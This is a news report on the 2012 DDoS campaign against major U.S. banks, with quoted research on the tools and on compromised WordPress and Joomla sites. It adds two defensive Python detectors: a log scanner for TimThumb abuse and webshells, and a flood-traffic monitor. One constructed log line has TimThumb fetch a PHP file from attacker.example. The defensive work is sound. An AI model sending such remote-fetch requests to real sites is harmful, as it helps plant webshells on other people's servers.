UPDATE — The group that claimed responsibility for large-scale distributed denial-of-service attacks against major U.S. banks in September and October has carried out another flurry of attacks that are still ongoing today.
Izz ad-Din al-Qassam Cyber Fighters posted its latest threat on Pastebin, again claiming the attacks are in retaliation for the portrayal of Muslims in the “Innocence of Muslims” movie trailers on YouTube. The group said earlier this week that the attacks were imminent and named U.S. Bancorp, JP Morgan Chase, Bank of America, PNC Financial Services Group and SunTrust Banks as its targets.
“In new phase, the wideness and the number of attacks will increase explicitly; and offenders and subsequently their governmental supporters will not be able to imagine and forecast the widespread and greatness of these attacks,” Izz ad-Din al-Qassam said in its post.
Arbor Networks this week said it noticed attacks against some of the named institutions using a mix of tools, including subtle modifications to Brobot, also known as itsoknoproblemobro. Solutionary, meanwhile, said that organizations using third-party hosting and processing services could experience delays in transaction processing because of the attacks.
“Some of this week’s attacks have been as large as 60Gbps. What makes these attacks so significant is not their size, but the fact that the attacks are quite focused, part of an ongoing campaign, and like most DDoS attacks quite public,” wrote Dan Holden, director of security research, and Curt Wilson, security analyst, of Arbor in a blog post. “These attacks utilize multiple targets, from network infrastructure to Web applications.”
Security companies such as Arbor and Prolexic were among the first to identify itsoknoproblemobro as one of the tools behind the attacks, which were successful in causing intermittent disruptions to online banking services in particular; the banks and security experts said no data or transactions were stolen.
The current wave of attacks has produced fewer outages, Holden told Threatpost, primarily because the banks had learned from the previous attacks, understood the attackers’ tactics, and were better prepared.
“It’s kind of like historical warfare; if you know when and how they’re going to come at you, you prepare better,” said Holden. “It will be interesting to see how the attackers grow and change further.”
In the latest set of attacks, the group has been able to fire bad traffic at multiple targets simultaneously, Holden said.
“If you’re sending 40 GBPS of traffic across two targets, that’s definitely a feat,” Holden said. “That’s difficult to do from the attacker’s standpoint, and difficult to defend. The banks have been far better prepared this time because they’ve seen these attacks before.”
Holden and Wilson said the attackers were using sites compromised via exploits against vulnerable PHP Web applications, including some Joomla sites as well as WordPress sites using a vulnerable plug-in called TimThumb. TimThumb is an image re-sizing library used in premium WordPress themes. Users of Joomla sites, meanwhile, were reporting iFrame injection attacks that were redirecting users to malicious sites. No connection between the two has been reported.
“Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools,” said Holden and Wilson. “Attackers connect to the compromised webservers hosting the tools directly or through intermediate servers/proxies/scripts and issue attack commands.”
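As an added illustration (not code from the article, Arbor or any of the quoted researchers), the following access-log scan looks for two footholds the paragraphs above attribute to the attackers' site compromises: the TimThumb resizer being asked to fetch a remote file, and PHP being executed from WordPress directories that should only ever serve static content. The detection heuristics, the directory list and every log line are assumptions constructed for this example.

```python
"""
Access-log scan for the two site-compromise footholds described above:
the TimThumb image resizer fetching a remote file, and PHP executing from
WordPress upload/cache directories. Heuristics and log lines are constructed
for illustration; they are not from the article or from Arbor.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Combined/common log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# WordPress directories that hold uploads and caches (assumed list). They have
# no reason to execute PHP, so a .php request answered with 200 here is a
# webshell indicator worth reviewing.
NO_EXEC_DIRS = ("/wp-content/uploads/", "/wp-content/cache/")

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(rec):
    """Return a finding label for a parsed record, or None if nothing is suspicious."""
    url = urlsplit(rec["path"])
    path = url.path.lower()
    if path.endswith("/timthumb.php"):
        src = parse_qs(url.query).get("src", [""])[0]
        # Normal use passes a local image path. A remote URL asks the resizer to
        # download content it does not control into the site's cache directory,
        # which is the pattern to review on an unmaintained site.
        if src.lower().startswith(("http://", "https://")):
            return "timthumb-remote-fetch"
    if path.endswith(".php") and path.startswith(NO_EXEC_DIRS) and rec["status"] == "200":
        return "php-executed-in-static-dir"
    return None

def scan(log_text):
    """Run classify() over every line and collect the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "label": label,
                             "method": rec["method"], "path": rec["path"]})
    return findings

def by_source(findings):
    """Count findings per client IP so one address touching several footholds stands out."""
    return Counter(f["ip"] for f in findings)

# Constructed sample log: one remote-fetch attempt, one PHP hit in an upload
# directory, a 404 that must not count, and ordinary traffic that must not be flagged.
SAMPLE_LOG = """\
203.0.113.9 - - [11/Dec/2012:09:15:02 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://attacker.example/x.php&w=100 HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
198.51.100.4 - - [11/Dec/2012:09:15:07 +0000] "GET /wp-content/themes/demo/timthumb.php?src=/wp-content/uploads/2012/11/logo.jpg&w=100 HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Dec/2012:09:16:40 +0000] "POST /wp-content/uploads/2012/12/cache.php HTTP/1.1" 200 88 "-" "-"
198.51.100.5 - - [11/Dec/2012:09:17:01 +0000] "GET /wp-content/uploads/2012/12/photo.jpg HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
198.51.100.6 - - [11/Dec/2012:09:17:15 +0000] "GET /index.php HTTP/1.1" 200 13102 "-" "Mozilla/5.0"
203.0.113.22 - - [11/Dec/2012:09:18:03 +0000] "GET /wp-content/cache/tmp.php HTTP/1.1" 404 512 "-" "-"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']:<14} {f['label']:<28} {f['method']} {f['path']}")
    print(by_source(scan(SAMPLE_LOG)))
```

Run against a real log, the per-source count is the useful triage view: a single address that both triggers a remote fetch and then reaches a PHP file under the upload tree is the sequence described in the quote above, whereas an isolated 404 against a cache path is usually just scanning noise.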
Brobot, KamiKaze and AMOS were among the tools identified by Arbor as those used in the initial run of attacks. KamiKaze packets are used in denial-of-service attacks because they require more router processing than typical traffic packets. The three tools in conjunction enable attackers to fire massive amounts of traffic at targets simultaneously, beating the banks’ built-in capabilities to absorb such attacks.
“Banks have high bandwidth connections into their data centers. They can take a lot of traffic, plus they all use security and DDoS protection services,” said Dmitri Alperovitch, CTO of CrowdStrike, of the September attacks, some of which peaked at 70 GBPS to 100 GBPS. “This is massively higher than what we see on a normal basis.”
Arbor said it has seen application layer attacks against HTTP, HTTPS and DNS, with attack packets coming from a number of protocols, including TCP, UDP and ICMP. In other words, sites may not be going down, but instead, applications could be crashing or become unavailable.
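The following added example (mine, not code from the article or from Arbor) makes the multi-vector, multi-target point of the preceding paragraphs concrete from the defender's side. It buckets NetFlow-style records by destination and by the vectors named above (HTTP, HTTPS, DNS, ICMP) before comparing each bucket with a baseline, so that a DNS resolver or HTTPS front end can be seen to be saturated even when the target's total bandwidth looks survivable. The flow records, the baselines and the alert threshold are all constructed assumptions.

```python
"""
Per-target, per-vector volume check over constructed NetFlow-style records.
One aggregate bandwidth figure hides which application front end is actually
saturated when HTTP, HTTPS, DNS and ICMP are mixed against several targets at
once, so flows are bucketed by (destination, vector) before comparison.
Flows, baselines and the threshold are made up for this example.
"""
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class Flow:
    t: int        # seconds since the start of the window
    src: str
    dst: str
    proto: str    # "tcp", "udp" or "icmp"
    dport: int    # 0 for icmp
    nbytes: int
    pkts: int

def vector_of(flow):
    """Name the vector a flow belongs to; anything else keeps its proto/port."""
    if flow.proto == "icmp":
        return "icmp"
    if flow.proto == "udp" and flow.dport == 53:
        return "dns"
    if flow.proto == "tcp" and flow.dport == 80:
        return "http"
    if flow.proto == "tcp" and flow.dport == 443:
        return "https"
    return f"{flow.proto}/{flow.dport}"

def aggregate(flows, window_s=10):
    """Return {(dst, vector): (bits_per_s, pkts_per_s, distinct_sources)}."""
    acc = defaultdict(lambda: [0, 0, set()])
    for f in flows:
        bucket = acc[(f.dst, vector_of(f))]
        bucket[0] += f.nbytes
        bucket[1] += f.pkts
        bucket[2].add(f.src)
    return {k: (v[0] * 8 / window_s, v[1] / window_s, len(v[2])) for k, v in acc.items()}

def alerts(stats, baseline_bps, factor=5.0):
    """Flag (dst, vector) buckets whose bit rate exceeds factor x their baseline.
    A bucket with no learned baseline is compared against the smallest known one,
    so a vector never seen before is not silently ignored."""
    fallback = min(baseline_bps.values())
    found = []
    for (dst, vec), (bps, pps, nsrc) in stats.items():
        ratio = bps / baseline_bps.get((dst, vec), fallback)
        if ratio > factor:
            found.append({"dst": dst, "vector": vec, "bps": bps,
                          "pps": pps, "sources": nsrc, "ratio": ratio})
    return sorted(found, key=lambda a: a["ratio"], reverse=True)

def targets_hit(alert_list):
    """Distinct destinations with at least one flagged vector (simultaneous targets)."""
    return sorted({a["dst"] for a in alert_list})

def build_sample():
    """Constructed 10 s window: modest background traffic plus a flood from
    50 sources hitting bank-a on HTTPS and DNS and bank-b on HTTP at the same time."""
    flows = []
    for dst in ("bank-a.example", "bank-b.example"):
        flows.append(Flow(1, "198.51.100.10", dst, "tcp", 443, 20_000, 40))
        flows.append(Flow(2, "198.51.100.11", dst, "udp", 53, 2_000, 10))
        flows.append(Flow(3, "198.51.100.12", dst, "tcp", 80, 10_000, 20))
    for i in range(50):
        src = f"203.0.113.{i + 1}"
        flows.append(Flow(5, src, "bank-a.example", "tcp", 443, 1_000_000, 700))
        flows.append(Flow(5, src, "bank-a.example", "udp", 53, 200_000, 2_000))
        flows.append(Flow(6, src, "bank-b.example", "tcp", 80, 1_000_000, 700))
    return flows

# Assumed "normal" bit rates per target and vector (constructed values).
BASELINE_BPS = {}
for _dst in ("bank-a.example", "bank-b.example"):
    BASELINE_BPS[(_dst, "https")] = 50_000
    BASELINE_BPS[(_dst, "dns")] = 5_000
    BASELINE_BPS[(_dst, "http")] = 20_000

if __name__ == "__main__":
    found = alerts(aggregate(build_sample()), BASELINE_BPS)
    for a in found:
        print(f"{a['dst']:<16} {a['vector']:<6} {a['bps'] / 1e6:8.1f} Mbps "
              f"{a['ratio']:8.0f}x baseline  {a['sources']} sources")
    print("targets under attack:", targets_hit(found))
```

On the sample, bank-a's HTTP bucket stays well under its baseline while its HTTPS and DNS buckets are hundreds of times over it, which is exactly the case a single per-target bandwidth threshold would misjudge; the distinct-source count per bucket is what distinguishes a distributed flood from one misbehaving client.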
“What these attacks have continued to demonstrate is that DDoS will continue to be a popular and increasingly complex attack vector. DDoS is no longer simply a network issue, but is increasingly a feature or additional aspect of other threats,” Holden and Wilson said. “The motivation of modern attackers can be singular, but the threat landscape continues to become more complex and mixes various threats to increase the likelihood of success.”
This article was updated at 11:45 a.m. ET to include further comment and analysis from Dan Holden of Arbor Networks.